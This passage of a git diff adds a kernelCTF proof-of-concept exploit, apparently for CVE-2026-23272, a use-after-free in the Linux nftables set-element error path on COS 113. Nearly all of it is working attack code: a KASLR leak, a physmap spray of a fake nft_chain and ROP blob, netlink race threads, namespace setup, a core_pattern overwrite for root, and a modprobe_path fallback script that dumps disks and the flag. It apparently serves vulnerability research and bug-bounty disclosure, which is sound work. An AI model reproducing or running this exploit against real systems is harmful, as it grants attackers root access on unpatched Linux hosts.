writer_fd; + uint32_t writer_pid; + pthread_barrier_t *bar; + uint64_t chain_kva; +}; + +static void *writer_thread(void *arg) { + struct race_args *a = arg; + pin_cpu(0); + pthread_barrier_wait(a->bar); + + uint8_t buf[262144]; + uint32_t seq = 10000; + uint64_t batches = 0; + + /* Build spray userdata: fake element with NFT_GOTO(physmap_chain) */ + uint8_t spray_udata[SPRAY_UDATA_LEN]; + build_spray_udata(spray_udata, a->chain_kva); + + printf("[*] writer: starting race with in-batch NEWTABLE spray (%d pairs/batch)\n", + SPRAY_BATCH_PAIRS); + + while (!g_stop) { + int len = build_race_batch(buf, sizeof(buf), &seq, a->writer_pid, + SPRAY_BATCH_PAIRS, spray_udata); + if (len > 0) nl_send(a->writer_fd, buf, len); + nl_drain(a->writer_fd); + batches++; + + if (batches % 10000 == 0) + printf("[*] writer: %lu batches\n", (unsigned long)batches); + } + + return NULL; +} + +static void *packet_thread(void *arg) { + struct race_args *a = arg; + (void)a; + pin_cpu(1); + pthread_barrier_wait(a->bar); + + int fd = socket(AF_INET, SOCK_DGRAM|SOCK_CLOEXEC, 0); + if (fd < 0) return NULL; + + struct sockaddr_in dst = { + .sin_family = AF_INET, + .sin_port = htons(31337), + .sin_addr.s_addr = htonl(INADDR_LOOPBACK) + }; + char pkt[1] = {'A'}; + + /* Connect so we can use send() which is faster than sendto() */ + connect(fd, (void *)&dst, sizeof(dst)); + + while (!g_stop) { + for (int i = 0; i < 2000 && !g_stop; i++) { + send(fd, pkt, 1, MSG_DONTWAIT); + } + } + close(fd); + return NULL; +} + +/* ========== core_pattern polling + SIGSEGV trigger ========== */ +static int check_core_pattern(void) { + int fd = open("/proc/sys/kernel/core_pattern", O_RDONLY); + if (fd < 0) return 0; + char buf[256]; + ssize_t n = read(fd, buf, sizeof(buf)-1); + close(fd); + if (n <= 0) return 0; + buf[n] = 0; + return strstr(buf, "/bin/dd") != NULL; +} + +static void trigger_core_dump(void) { + printf("[*] triggering core dump via SIGSEGV...\n"); + pid_t p = fork(); + if (p == 0) { + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + raise(SIGSEGV); + _exit(1); + } + if (p > 0) { + int status; + waitpid(p, &status, 0); + printf("[*] core dump child exited (sig=%d)\n", + WIFSIGNALED(status) ? WTERMSIG(status) : 0); + } +} + +/* ========== modprobe_path fallback (for local QEMU testing) ========== */ +static void setup_payload(void) { + int fd = open("/tmp/pw", O_CREAT|O_WRONLY|O_TRUNC, 0755); + if (fd < 0) return; + const char *s = + "#!/bin/sh\n" + "/bin/cat /dev/vdb > /tmp/flag 2>/dev/null\n" + "/bin/cat /dev/vda >> /tmp/flag 2>/dev/null\n" + "/bin/cat /flag >> /tmp/flag 2>/dev/null\n" + "/bin/cat /dev/vdb > /dev/ttyS0 2>/dev/null\n" + "/bin/cat /dev/vda >> /dev/ttyS0 2>/dev/null\n" + "/bin/chmod 777 /tmp/flag 2>/dev/null\n"; + write(fd, s, strlen(s)); close(fd); + + fd = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755); + if (fd < 0) return; + write(fd, "\xff\xff\xff\xff", 4); close(fd); +} + +static int try_modprobe(void) { + pid_t p = fork(); + if (p == 0) { execl("/tmp/dummy", "/tmp/dummy", NULL); _exit(0); } + if (p > 0) waitpid(p, NULL, 0); + sleep_ms(500); + int fd = open("/tmp/flag", O_RDONLY); + if (fd >= 0) { + char buf[4096]; + ssize_t n = read(fd, buf, sizeof(buf)-1); + close(fd); + if (n > 0) { buf[n]=0; printf("[+] FLAG:\n%s\n", buf); return 1; } + } + return 0; +} + +/* ========== 3D candidate generation ========== */ +static void add_cand(uint64_t kb, uint64_t pb, uint64_t kva_off) { + if (num_cands3d >= MAX_CANDS) return; + cands3d[num_cands3d++] = (struct cand3d){kb, pb, kva_off}; +} + +static void generate_candidates(void) { + /* + * __init_begin page reclaim strategy: + * After boot, 642 pages at kbase+OFF_INIT_BEGIN are freed to buddy allocator. + * mmap+MAP_POPULATE reclaims ~186 of them (642/total_pages * mmap_pages). + * These pages remain mapped at kbase+OFF_INIT_BEGIN+offset (kernel text mapping, + * CONFIG_DEBUG_PAGEALLOC=n so mapping persists). + * + * We fill ALL mmap'd pages with our fake chain. Pages that happen to be __init + * pages are visible at kbase-relative KVAs. We try offsets within the __init range. + * + * With 13 candidates (20s each), step through __init range (642 pages). + * Expected ~186 of our pages are __init → ~4 of 13 candidates will match. + */ + uint64_t kb = eb_kbases[0]; + int ncands = MAX_CANDS; + uint64_t step = (INIT_SIZE / ncands) & ~0xFFFULL; /* page-align */ + if (step < 0x1000) step = 0x1000; + + printf("[*] __init candidates: %d offsets (step=%#lx) in kbase+%#lx..+%#lx\n", + ncands, (unsigned long)step, + (unsigned long)OFF_INIT_BEGIN, (unsigned long)OFF_INIT_END); + + for (int i = 0; i < ncands && num_cands3d < MAX_CANDS; i++) { + uint64_t off = (uint64_t)i * step; + if (off + OFF_INIT_BEGIN >= OFF_INIT_END) + off = INIT_SIZE - 0x1000; /* clamp to last page */ + /* kva_off stores the offset from kbase (not from phbase) */ + add_cand(kb, 0, OFF_INIT_BEGIN + off); + } + + printf("[*] generated %d candidates (budget=%ds, cycle=%ds)\n", + num_cands3d, RACE_SECONDS, CYCLE_SECONDS); +} + +/* ========== exploit child (runs in namespace) ========== */ +static void on_alarm(int sig) { (void)sig; g_stop = 1; } + +static int exploit_child(int cycle_secs) { + setup_ns(); + + struct nlsock ns = nl_open(); + if (ns.fd < 0) die("netlink"); + int fl = fcntl(ns.fd, F_GETFL, 0); + fcntl(ns.fd, F_SETFL, fl & ~O_NONBLOCK); + + int err = nft_setup_all(ns.fd, ns.pid); + if (err < 0) { + fprintf(stderr, "[-] nft setup: %d\n", err); + return 1; + } + printf("[+] nft objects ready\n"); + fcntl(ns.fd, F_SETFL, fl | O_NONBLOCK); + + /* Start race threads */ + g_stop = 0; + signal(SIGALRM, on_alarm); + signal(SIGTERM, on_alarm); + alarm(cycle_secs + 2); + + #define N_THREADS 2 + pthread_barrier_t bar; + pthread_barrier_init(&bar, NULL, N_THREADS); + + struct race_args ra = { + .writer_fd = ns.fd, .writer_pid = ns.pid, + .bar = &bar, .chain_kva = g_page_kva, + }; + + pthread_t threads[N_THREADS]; + pthread_create(&threads[0], NULL, writer_thread, &ra); + pthread_create(&threads[1], NULL, packet_thread, &ra); + + printf("[*] racing for %ds...\n", cycle_secs); + while (!g_stop) sleep_ms(100); + + g_stop = 1; + for (int i = 0; i < N_THREADS; i++) pthread_join(threads[i], NULL); + close(ns.fd); + return 0; +} + +/* ========== memory sizing ========== */ +static void auto_physmap_size(void) { + FILE *f = fopen("/proc/meminfo", "r"); + if (!f) return; + char line[256]; + while (fgets(line, sizeof(line), f)) { + unsigned long kb; + if (sscanf(line, "MemTotal: %lu kB", &kb) == 1) { + int avail = (int)(kb / 1024); + /* Use 40% of available RAM for physmap spray - aggressive but safe. + * On 3.5GB kctf VM this gives ~1.4GB spray → ~40% physical coverage */ + int cap = avail * 2 / 5; + if (cap < 128) cap = 128; + if (cap > 2048) cap = 2048; + if (physmap_mb > cap) physmap_mb = cap; + printf("[*] RAM=%dMB, physmap capped to %dMB\n", avail, physmap_mb); + break; + } + } + fclose(f); +} + +/* ========== main exploit ========== */ +int main(void) { + setbuf(stdout, NULL); setbuf(stderr, NULL); + printf("=== COS-113 err_set_full UAF exploit ===\n"); + + auto_physmap_size(); + + /* Check for environment-provided addresses (nokaslr local testing) */ + uint64_t env_kb = env_u64("KBASE"), env_pb = env_u64("PHYSBASE"); + if (env_kb && env_pb) { + kbase = env_kb; phbase = env_pb; + eb_kbases[0] = kbase; eb_nkb = 1; + eb_phbases[0] = phbase; eb_npb = 1; + printf("[+] using env: kbase=%#lx phbase=%#lx\n", + (unsigned long)kbase, (unsigned long)phbase); + } else { + do_entrybleed(); + if (!kbase || !phbase) { + fprintf(stderr, "[-] entrybleed failed completely\n"); + return 1; + } + } + printf("[+] primary kbase=%#lx phbase=%#lx\n", + (unsigned long)kbase, (unsigned long)phbase); + printf("[+] kbase candidates: %d, phbase candidates: %d\n", eb_nkb, eb_npb); + + setup_payload(); + physmap_spray(); + + /* Try to get exact KVA from pagemap (works on local QEMU, not on kctf). + * When available, use phbase-based KVA for the single candidate. + * On kctf, pagemap is restricted — fall through to __init candidates. */ + uint64_t exact_kva = read_physmap_kva(); + if (exact_kva) { + printf("[+] exact KVA from pagemap: %#lx\n", (unsigned long)exact_kva); + /* Store as absolute KVA; main loop computes g_page_kva = kb + kva_off, + * so set kva_off = exact_kva - kbase (works because g_page_kva = kbase + kva_off) */ + cands3d[0] = (struct cand3d){kbase, 0, exact_kva - kbase}; + num_cands3d = 1; + } else { + generate_candidates(); + } + + struct timespec race_start; + clock_gettime(CLOCK_MONOTONIC, &race_start); + + int won = 0; + uint64_t prev_kb = 0, prev_pb = 0; + + for (int ci = 0; ci < num_cands3d && !won; ci++) { + /* Check total timeout */ + struct timespec now; + clock_gettime(CLOCK_MONOTONIC, &now); + long elapsed = now.tv_sec - race_start.tv_sec; + if (elapsed >= RACE_SECONDS) { + printf("[-] total timeout (%ds) reached at candidate %d/%d\n", + RACE_SECONDS, ci, num_cands3d); + break; + } + + /* Update globals for this candidate */ + kbase = cands3d[ci].kb; + /* For __init approach: kva_off is offset FROM kbase (not from phbase) */ + g_page_kva = kbase + cands3d[ci].kva_off; + + /* Print header when kbase changes */ + if (kbase != prev_kb) { + printf("\n[*] --- kbase=%#lx (init range %#lx-%#lx) ---\n", + (unsigned long)kbase, + (unsigned long)(kbase + OFF_INIT_BEGIN), + (unsigned long)(kbase + OFF_INIT_END)); + prev_kb = kbase; + } + printf("[*] cand %d/%d: kva=%#lx (init+%#lx) [%lds]\n", + ci+1, num_cands3d, (unsigned long)g_page_kva, + (unsigned long)(cands3d[ci].kva_off - OFF_INIT_BEGIN), elapsed); + + /* Refill physmap with ROP blob for current (kbase, kva) */ + physmap_fill_rop(); + + int cycle_secs = (num_cands3d == 1) ? RACE_SECONDS : CYCLE_SECONDS; + + pid_t child = fork(); + if (child < 0) die("fork"); + if (child == 0) _exit(exploit_child(cycle_secs)); + + /* Parent: poll core_pattern while child races */ + for (int t = 0; t < cycle_secs * 2 && !won; t++) { + sleep_ms(500); + if (check_core_pattern()) { + printf("[+] GOT ROOT - core_pattern overwritten!\n"); + sleep_ms(500); + trigger_core_dump(); + printf("[*] waiting for core dump handler (dd -> ttyS0)...\n"); + sleep_ms(5000); + printf("[+] ROOT OUTPUT - flag should be on serial\n"); + int fd = open("/tmp/flag", O_RDONLY); + if (fd >= 0) { + char buf[4096]; + ssize_t n = read(fd, buf, sizeof(buf)-1); + close(fd); + if (n > 0) { buf[n] = 0; printf("[+] FLAG:\n%s\n", buf); } + } + won = 1; + break; + } + int status; + if (waitpid(child, &status, WNOHANG) > 0) { + printf("[*] child exited early (status=%d sig=%d)\n", + WIFEXITED(status) ? WEXITSTATUS(status) : -1, + WIFSIGNALED(status) ? WTERMSIG(status) : 0); + child = 0; + break; + } + } + + if (child > 0) { + kill(child, SIGTERM); + sleep_ms(500); + kill(child, SIGKILL); + waitpid(child, NULL, 0); + } + } + + /* Fallback: try modprobe_path (for local QEMU testing) */ + if (!won) { + printf("[*] trying modprobe_path fallback...\n"); + for (int i = 0; i < 5 && !won; i++) { + if (try_modprobe()) { won = 1; break; } + sleep_ms(1000); + } + } + + if (won) { printf("\n[+] SUCCESS\n"); return 0; } + printf("\n[-] exploit did not achieve root\n"); + return 1; +} diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit_xdk.cpp b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit_xdk.cpp new file mode 100644 index 000000000..3873110a3 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit_xdk.cpp @@ -0,0 +1,1716 @@ +/* + * LPE exploit for cos-113-18244.521.98 (Linux 6.1.155) + * kernelXDK-ported version + * + * Vulnerability: UAF in nft_add_set_elem() err_set_full path. + * When a set with size=1 is full, element is inserted via + * hlist_add_head_rcu(), atomic_add_unless() fails, element + * removed via hlist_del_rcu() and freed via kfree() (NOT + * kfree_rcu). Concurrent RCU readers can access freed element. + * + * Exploitation: + * 1. Entrybleed KASLR bypass (kbase only, phbase not needed). + * 2. Physmap spray with fake nft_chain + ROP blob at __init_begin pages. + * 3. Create verdict map (hash, size=1, key_len=4) with fill element + + * base chain with immediate(KEY_RACE) + lookup rule. + * 4. Race: writer inserts elements (freed via err_set_full), in-batch + * NEWTABLE userdata spray reclaims kmalloc-cg-64 slot with fake + * element containing NFT_GOTO(physmap_chain). + * 5. Packet flood triggers lookup -> follows fake verdict -> + * nft_do_chain on fake chain -> ROP. + * 6. ROP: kernelXDK WRITE_WHAT_WHERE_64 actions rewrite core_pattern + * in-place, then kernelXDK MSLEEP stalls the thread. + * 7. Parent detects overwrite, triggers SIGSEGV -> core dump -> flag + * via serial. + */ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* kernelXDK headers */ +#include +#include + +/* Embed the KXDB target database into the binary */ +INCBIN(target_db, "target_db.kxdb"); +/* xdk INCBIN macro leaves the assembler section in .bss; restore .text. */ +__asm__(".text\n"); + +/* ================================================================ + * Style-guide magic number constants + * ================================================================ */ +#define RACE_CPU 0 +#define FLOOD_CPU 1 +#define DROP_UID 1000 +#define DROP_GID 1000 +#define NL_BUFSZ (8 << 20) /* 8MB netlink socket buffer */ +#define NL_POLL_SLEEP_NS 500000 /* 0.5ms poll backoff */ +#define UDP_PORT 31337 +#define DREG_RET 130 /* nft_do_chain return address dreg */ +#define DREG_EXPR_LEN 16 /* bytes per dreg write */ +#define MSLEEP_FOREVER 0x7FFFFFFFULL +#define SET_DATA_TYPE_VERDICT 0xffffff00u +#define SET_ID_SPRAY 99 +#define RACE_SEQ_START 10000 +#define ALARM_GRACE_SEC 2 +#define WRITER_PROGRESS 2000 +#define KVM_PH_CORRECTION 0x100000000ULL /* 4GB */ +#define KB_COARSE_TIMING 16 +#define KB_FINE_TIMING 32 +#define PB_COARSE_TIMING 40 +#define CORE_DUMP_WAIT_MS 5000 +#define MODPROBE_WAIT_MS 500 +#define MODPROBE_RETRY_MS 1000 +#define POLL_INTERVAL_MS 500 +#define KILL_GRACE_MS 500 + +/* ================================================================ + * Protocol constants + * ================================================================ */ +#ifndef NFPROTO_UNSPEC +#define NFPROTO_UNSPEC 0 +#endif +#ifndef NFPROTO_INET +#define NFPROTO_INET 1 +#endif +#ifndef NFPROTO_IPV4 +#define NFPROTO_IPV4 2 +#endif +#ifndef NFPROTO_IPV6 +#define NFPROTO_IPV6 10 +#endif +#ifndef NF_INET_LOCAL_OUT +#define NF_INET_LOCAL_OUT 3 +#endif +#ifndef NF_IP_PRI_FILTER +#define NF_IP_PRI_FILTER 0 +#endif +#ifndef NFTA_TABLE_USERDATA +#define NFTA_TABLE_USERDATA 6 +#endif + +/* ================================================================ + * Kernel symbol offsets -- resolved at runtime from kernelXDK + * + * Fallback values are for cos-113-18244.521.98 vmlinux if the + * KXDB database does not contain the target or symbol. + * ================================================================ */ +/* 0x02bb9ec0: core_pattern (kernel global for core dump handler path) */ +static uint64_t off_core_pattern = 0x2bb9ec0; +/* 0x01d43120: nft_immediate_ops (nft expression ops struct for immediate) */ +static uint64_t off_nft_imm_ops = 0x1d43120; + +static uint64_t off_init_begin = 0x345c000; +static uint64_t off_init_end = 0x36de000; +static std::unique_ptr g_xdk_target; + +/* ================================================================ + * nft_chain layout -- for the fake chain on physmap pages + * + * struct nft_chain (120 bytes): + * +0: blob_gen_0 (ptr) + * +8: blob_gen_1 (ptr) + * +64: table (ptr) + * +72: handle (u64) + * +80: use (u32) + * +84: flags (u8) + * +88: name (ptr) + * ================================================================ */ +#define NFT_CHAIN_OFFS_BLOB0 0 +#define NFT_CHAIN_OFFS_BLOB1 8 +#define NFT_CHAIN_OFFS_TABLE 64 +#define NFT_CHAIN_OFFS_HANDLE 72 +#define NFT_CHAIN_OFFS_USE 80 +#define NFT_CHAIN_OFFS_FLAGS 84 +#define NFT_CHAIN_OFFS_NAME 88 + +/* nft_hash_elem spray overlay offsets */ +#define NFT_HASH_ELEM_OFFS_GENMASK 16 +#define NFT_HASH_ELEM_OFFS_KEY_OFF 17 +#define NFT_HASH_ELEM_OFFS_DATA_OFF 19 +#define NFT_HASH_ELEM_OFFS_KEY 32 +#define NFT_HASH_ELEM_OFFS_VERDICT 36 +#define NFT_HASH_ELEM_OFFS_CHAIN 44 + +/* page layout for physmap ROP blob */ +#define BLOB_OFFSET 0x80 +#define NAME_OFFSET 0x300 + +/* ================================================================ + * Register custom target data for symbols/structs not in the + * standard KXDB database + * ================================================================ */ +static void register_custom_targets(TargetDb &kxdb) { + Target ct("kernelctf", "cos-113-18244.521.98"); + + /* Symbols specific to cos-113-18244.521.98 vmlinux */ + ct.AddSymbol("core_pattern", 0x2bb9ec0); + ct.AddSymbol("nft_immediate_ops", 0x1d43120); + ct.AddSymbol("__init_begin", 0x345c000); + ct.AddSymbol("__init_end", 0x36de000); + + /* nft_chain layout */ + ct.AddStruct("nft_chain", 120, { + {"blob_gen_0", 0, 8}, + {"blob_gen_1", 8, 8}, + {"table", 64, 8}, + {"handle", 72, 8}, + {"use", 80, 4}, + {"flags", 84, 1}, + {"name", 88, 8}, + }); + + kxdb.AddTarget(ct); +} + +/* + * Resolve all offsets from the kernelXDK target database. + * Falls back to hardcoded cos-113 values if a symbol is missing. + * Post-RIP execution still requires kernelXDK ROP actions. + */ + +static uint64_t try_get_symbol(Target &target, const char *name, + uint64_t fallback) { + try { + uint64_t off = target.GetSymbolOffset(name); + if (off != 0) return off; + } catch (...) {} + printf("[*] xdk: symbol '%s' not in KXDB, using fallback %#lx\n", + name, (unsigned long)fallback); + return fallback; +} + +// @step(name="kernelXDK Offset Resolution") +static void xdk_init_offsets(void) { + try { + TargetDb kxdb("target_db.kxdb", target_db); + register_custom_targets(kxdb); + + auto target = kxdb.AutoDetectTarget(); + printf("[+] xdk: detected target: %s %s\n", + target.GetDistro().c_str(), + target.GetReleaseName().c_str()); + + /* Resolve symbol offsets */ + off_core_pattern = try_get_symbol(target, "core_pattern", off_core_pattern); + off_nft_imm_ops = try_get_symbol(target, "nft_immediate_ops", off_nft_imm_ops); + off_init_begin = try_get_symbol(target, "__init_begin", off_init_begin); + off_init_end = try_get_symbol(target, "__init_end", off_init_end); + g_xdk_target = std::make_unique(target); + + /* Refuse to silently fall back to manual gadgets for post-RIP work. */ + g_xdk_target->GetRopActionItems(RopActionId::WRITE_WHAT_WHERE_64); + g_xdk_target->GetRopActionItems(RopActionId::MSLEEP); + + printf("[+] xdk: symbols and post-RIP actions resolved\n"); + } catch (std::exception &e) { + printf("[!] xdk init failed: %s -- symbol fallbacks may still work, " + "but kernelXDK post-RIP actions are unavailable\n", e.what()); + g_xdk_target.reset(); + } +} + +/* ================================================================ + * Exploit constants + * ================================================================ */ + +/* spray: in-batch NEWTABLE userdata for kmalloc-cg-64 reclamation */ +#define SPRAY_UDATA_LEN 52 +#define SPRAY_BATCH_PAIRS 256 + +#define PHYSMAP_MB 1024 + +#define KEY_FILL 0x00000000u +#define KEY_RACE 0x00000001u +#define NFT_GOTO_CODE ((uint32_t)(-4)) + +#define RACE_SECONDS 260 +#define CYCLE_SECONDS 10 +#define MAX_CANDS 26 +#define VULN_TRIGGER_SECS 30 +#define MAX_EB_CANDS 5 + +/* ========== globals ========== */ +static volatile sig_atomic_t g_stop; +static uint64_t kbase, phbase; +static void *phys_region; +static int physmap_mb = PHYSMAP_MB; +static uint64_t g_page_kva; + +/* Candidate search: (kbase, init_page_offset) pairs */ +struct cand3d { + uint64_t kbase, phbase, kva_off; +}; +static struct cand3d cands3d[MAX_CANDS]; +static int num_cands3d; + +/* EntryBleed multi-candidate output */ +static uint64_t eb_kbases[MAX_EB_CANDS]; +static int eb_nkb; +static uint64_t eb_phbases[MAX_EB_CANDS]; +static int eb_npb; + +/* ========== helpers ========== */ +static void die(const char *msg) { + perror(msg); + _exit(1); +} + +static void sleep_ms(int ms) { + struct timespec ts = {ms/1000, (ms%1000)*1000000L}; + // @sleep(desc="generic millisecond sleep helper") + nanosleep(&ts, nullptr); +} + +static uint64_t env_u64(const char *name) { + const char *val = getenv(name); + return val ? strtoull(val, nullptr, 0) : 0; +} + +/* + * Parse a u64 from CLI input. + * Accepts: + * - decimal (e.g. 1234) + * - 0x-prefixed hex (e.g. 0xffffffff81000000) + * - raw hex without prefix (e.g. ffffffff81000000 from /proc/kallsyms) + */ +static bool parse_u64_arg(const char *s, uint64_t *out) { + if (!s || !*s || !out) return false; + errno = 0; + char *end = nullptr; + unsigned long long v = strtoull(s, &end, 0); + if (errno == 0 && end != s && *end == '\0') { + *out = static_cast(v); + return true; + } + + errno = 0; + end = nullptr; + v = strtoull(s, &end, 16); + if (errno == 0 && end != s && *end == '\0') { + *out = static_cast(v); + return true; + } + return false; +} + +/* + * Best-effort integrated KASLR base leak from /proc/kallsyms. + * Returns 0 when restricted/unavailable. + */ +static uint64_t leak_kbase_proc_kallsyms(void) { + FILE *f = fopen("/proc/kallsyms", "r"); + if (!f) return 0; + + char line[512]; + uint64_t kb = 0; + while (fgets(line, sizeof(line), f)) { + char addr_s[64] = {}; + char type = '\0'; + char sym[256] = {}; + if (sscanf(line, "%63s %c %255s", addr_s, &type, sym) != 3) continue; + uint64_t v = 0; + if (!parse_u64_arg(addr_s, &v)) continue; + if (!v) continue; /* kptr_restrict usually yields all-zero addresses */ + if (v < 0xffffffff80000000ULL || v > 0xfffffffff0000000ULL) continue; + kb = v & ~0x1fffffULL; /* normalize to 2MB-aligned kernel base */ + break; + } + fclose(f); + return kb; +} + +static bool kernel_cmdline_has_token(const char *tok) { + if (!tok || !*tok) return false; + FILE *f = fopen("/proc/cmdline", "r"); + if (!f) return false; + char line[4096]; + bool found = false; + if (fgets(line, sizeof(line), f)) { + found = strstr(line, tok) != nullptr; + } + fclose(f); + return found; +} + +/* ========== netlink buffer helpers ========== */ +struct nlbuf { + uint8_t *buf; + size_t len, cap; +}; + +static void nlbuf_init(struct nlbuf *nb, void *buf, size_t cap) { + nb->buf = static_cast(buf); + nb->len = 0; + nb->cap = cap; +} + +static struct nlmsghdr *nlbuf_begin_msg(struct nlbuf *nb, uint16_t type, + uint16_t flags, uint32_t seq, uint32_t pid, uint8_t fam, uint16_t res) +{ + size_t off = NLMSG_ALIGN(nb->len); + size_t need = off + NLMSG_SPACE(sizeof(struct nfgenmsg)); + if (need > nb->cap) return nullptr; + struct nlmsghdr *nlh = reinterpret_cast(nb->buf + off); + memset(nlh, 0, NLMSG_SPACE(sizeof(struct nfgenmsg))); + nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + nlh->nlmsg_type = type; + nlh->nlmsg_flags = flags; + nlh->nlmsg_seq = seq; + nlh->nlmsg_pid = pid; + struct nfgenmsg *g = static_cast(NLMSG_DATA(nlh)); + g->nfgen_family = fam; + g->version = NFNETLINK_V0; + g->res_id = htons(res); + nb->len = off + NLMSG_ALIGN(nlh->nlmsg_len); + return nlh; +} + +static int nlbuf_put(struct nlbuf *nb, struct nlmsghdr *nlh, uint16_t type, + const void *data, uint16_t data_len) +{ + size_t mo = static_cast(reinterpret_cast(nlh) - nb->buf); + size_t me = mo + NLMSG_ALIGN(nlh->nlmsg_len); + if (me != nb->len) return -1; + size_t nl = NLA_HDRLEN + data_len, np = NLA_ALIGN(nl); + if (me + np > nb->cap) return -1; + struct nlattr *a = reinterpret_cast(nb->buf + me); + a->nla_type = type; + a->nla_len = static_cast<__u16>(nl); + if (data_len) memcpy(reinterpret_cast(a) + NLA_HDRLEN, data, data_len); + if (np > nl) memset(reinterpret_cast(a) + nl, 0, np - nl); + nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + static_cast<__u32>(np); + nb->len = mo + NLMSG_ALIGN(nlh->nlmsg_len); + return 0; +} + +static struct nlattr *nlbuf_nest_start(struct nlbuf *nb, struct nlmsghdr *nlh, uint16_t type) { + size_t mo = static_cast(reinterpret_cast(nlh) - nb->buf); + size_t me = mo + NLMSG_ALIGN(nlh->nlmsg_len); + if (me != nb->len) return nullptr; + size_t np = NLA_ALIGN(NLA_HDRLEN); + if (me + np > nb->cap) return nullptr; + struct nlattr *a = reinterpret_cast(nb->buf + me); + a->nla_type = type | NLA_F_NESTED; + a->nla_len = NLA_HDRLEN; + if (np > NLA_HDRLEN) memset(reinterpret_cast(a) + NLA_HDRLEN, 0, np - NLA_HDRLEN); + nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + static_cast<__u32>(np); + nb->len = mo + NLMSG_ALIGN(nlh->nlmsg_len); + return a; +} + +static void nlbuf_nest_end(struct nlbuf *nb, struct nlattr *n) { + (void)nb; + n->nla_len = static_cast<__u16>(nb->buf + nb->len - reinterpret_cast(n)); +} + +static int nl_u32be(struct nlbuf *nb, struct nlmsghdr *nlh, uint16_t type, uint32_t val) { + val = htonl(val); + return nlbuf_put(nb, nlh, type, &val, 4); +} + +static int nl_strz(struct nlbuf *nb, struct nlmsghdr *nlh, uint16_t type, const char *str) { + return nlbuf_put(nb, nlh, type, str, static_cast(strlen(str) + 1)); +} + +/* ========== netlink socket ========== */ +struct nlsock { + int fd; + uint32_t pid; +}; + +static struct nlsock nl_open(void) { + struct nlsock s = {-1, 0}; + int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER); + if (fd < 0) return s; + struct sockaddr_nl sa = {}; + sa.nl_family = AF_NETLINK; + if (bind(fd, reinterpret_cast(&sa), sizeof(sa)) < 0) { + close(fd); + return s; + } + socklen_t sl = sizeof(sa); + getsockname(fd, reinterpret_cast(&sa), &sl); + s.pid = sa.nl_pid; + s.fd = fd; + int bufsz = NL_BUFSZ; + setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &bufsz, sizeof(bufsz)); + setsockopt(fd, SOL_SOCKET, SO_SNDBUF, &bufsz, sizeof(bufsz)); + int fl = fcntl(fd, F_GETFL, 0); + if (fl >= 0) fcntl(fd, F_SETFL, fl | O_NONBLOCK); + return s; +} + +static int nl_send(int fd, const void *buf, size_t len) { + struct sockaddr_nl sa = {}; + sa.nl_family = AF_NETLINK; + struct iovec iov = {const_cast(buf), len}; + struct msghdr msg = {}; + msg.msg_name = &sa; + msg.msg_namelen = sizeof(sa); + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + return sendmsg(fd, &msg, 0) < 0 ? -1 : 0; +} + +static int nl_drain(int fd) { + uint8_t buf[16384]; + for (;;) { + ssize_t r = recv(fd, buf, sizeof(buf), MSG_DONTWAIT); + if (r <= 0) break; + } + return 0; +} + +static int nl_wait_acks(int fd, int n, int tmo_ms) { + struct timespec start, now; + clock_gettime(CLOCK_MONOTONIC, &start); + int seen = 0, last = 0; + uint8_t buf[16384]; + while (seen < n) { + ssize_t r = recv(fd, buf, sizeof(buf), MSG_DONTWAIT); + if (r > 0) { + int rem = static_cast(r); + for (struct nlmsghdr *nlh = reinterpret_cast(buf); + NLMSG_OK(nlh, static_cast(rem)); nlh = NLMSG_NEXT(nlh, rem)) { + if (nlh->nlmsg_type == NLMSG_ERROR) { + struct nlmsgerr *e = static_cast(NLMSG_DATA(nlh)); + seen++; + last = e->error; + } + } + } + clock_gettime(CLOCK_MONOTONIC, &now); + long ms = (now.tv_sec-start.tv_sec)*1000 + (now.tv_nsec-start.tv_nsec)/1000000; + if (ms > tmo_ms) return -ETIMEDOUT; + if (r <= 0) { + // @sleep(desc="poll backoff waiting for netlink ACKs") + struct timespec sl = {0, NL_POLL_SLEEP_NS}; + nanosleep(&sl, nullptr); + } + } + return last; +} + +/* ========== batch helpers ========== */ +#define NFT_T(msg) ((NFNL_SUBSYS_NFTABLES << 8) | (msg)) +#define NLC (NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL) + +static int batch_begin(struct nlbuf *nb, uint32_t seq, uint32_t pid) { + return nlbuf_begin_msg(nb, NFNL_MSG_BATCH_BEGIN, NLM_F_REQUEST, seq, pid, + NFPROTO_INET, NFNL_SUBSYS_NFTABLES) ? 0 : -1; +} +static int batch_end(struct nlbuf *nb, uint32_t seq, uint32_t pid) { + return nlbuf_begin_msg(nb, NFNL_MSG_BATCH_END, NLM_F_REQUEST, seq, pid, + NFPROTO_INET, NFNL_SUBSYS_NFTABLES) ? 0 : -1; +} + +/* ========== namespace setup ========== */ +// @step(name="Namespace Setup") +static void xwrite(const char *path, const char *str) { + int fd = open(path, O_WRONLY|O_CLOEXEC); + if (fd < 0) die(path); + if (write(fd, str, strlen(str)) < 0) { /* ignore */ } + close(fd); +} + +static void setup_ns(void) { + uid_t uid = getuid(); + gid_t gid = getgid(); + if (uid == 0) { + setresgid(DROP_GID, DROP_GID, DROP_GID); + setresuid(DROP_UID, DROP_UID, DROP_UID); + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + uid = getuid(); + gid = getgid(); + } + if (unshare(CLONE_NEWUSER) < 0) die("unshare(USER)"); + xwrite("/proc/self/setgroups", "deny\n"); + char mapbuf[64]; + snprintf(mapbuf, sizeof(mapbuf), "0 %u 1\n", uid); + xwrite("/proc/self/uid_map", mapbuf); + snprintf(mapbuf, sizeof(mapbuf), "0 %u 1\n", gid); + xwrite("/proc/self/gid_map", mapbuf); + setresgid(0, 0, 0); + setresuid(0, 0, 0); + if (unshare(CLONE_NEWNET) < 0) die("unshare(NET)"); + int 